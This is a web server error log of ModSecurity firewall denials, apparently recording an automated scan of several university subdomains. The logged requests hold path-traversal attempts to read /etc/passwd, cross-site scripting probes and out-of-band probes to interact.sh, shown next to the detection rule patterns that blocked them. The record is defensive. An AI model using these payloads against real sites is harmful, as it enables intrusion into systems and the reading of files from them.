[Tue Aug 29 11:55:44.546694 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqY6HgAAAAr"]
[Tue Aug 29 11:55:44.547025 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqSwzIAAAAN"]
[Tue Aug 29 11:55:44.552206 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqqtisAAAAA"]
[Tue Aug 29 11:55:44.565059 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAq@sX0AAAAM"]
[Tue Aug 29 11:55:44.580454 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqqtiwAAAAA"]
[Tue Aug 29 11:55:44.603560 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqeFacAAAAx"]
[Tue Aug 29 11:55:44.604977 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqSwzQAAAAN"]
[Tue Aug 29 11:55:44.629449 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UMCo-f0AAAolKvwAAAAe"]
[Tue Aug 29 11:55:44.648259 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqY6HwAAAAr"]
[Tue Aug 29 11:55:44.670990 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqY6H0AAAAr"]
[Tue Aug 29 11:55:44.695410 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16UMCo-f0AAAq@sYIAAAAM"]
[Tue Aug 29 11:55:44.695510 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqqti8AAAAA"]
[Tue Aug 29 11:55:45.617344 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqeFa0AAAAx"]
[Tue Aug 29 11:55:45.640931 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqSwzsAAAAN"]
[Tue Aug 29 11:55:45.666512 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqY6IEAAAAr"]
[Tue Aug 29 11:55:45.723729 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqTvxoAAAAa"]
[Tue Aug 29 11:55:45.835654 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UcCo-f0AAAq@sYwAAAAM"]
[Tue Aug 29 11:55:45.877160 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UcCo-f0AAAq@sY4AAAAM"]
[Tue Aug 29 11:55:45.885334 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqeFbUAAAAx"]
[Tue Aug 29 11:55:46.532480 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq@sZEAAAAM"]
[Tue Aug 29 11:55:46.563635 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq-HX8AAAAT"]
[Tue Aug 29 11:55:46.568246 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqY6IkAAAAr"]
[Tue Aug 29 11:55:46.578695 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq@sZMAAAAM"]
[Tue Aug 29 11:55:46.593071 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAApbUn8AAAAh"]
[Tue Aug 29 11:55:46.601168 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAolKwQAAAAe"]
[Tue Aug 29 11:55:46.615114 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqY6IsAAAAr"]
[Tue Aug 29 11:55:46.643657 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqSw0EAAAAN"]
[Tue Aug 29 11:55:46.668915 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq@sZYAAAAM"]
[Tue Aug 29 11:55:46.669051 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqSw0IAAAAN"]
[Tue Aug 29 11:55:46.670165 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 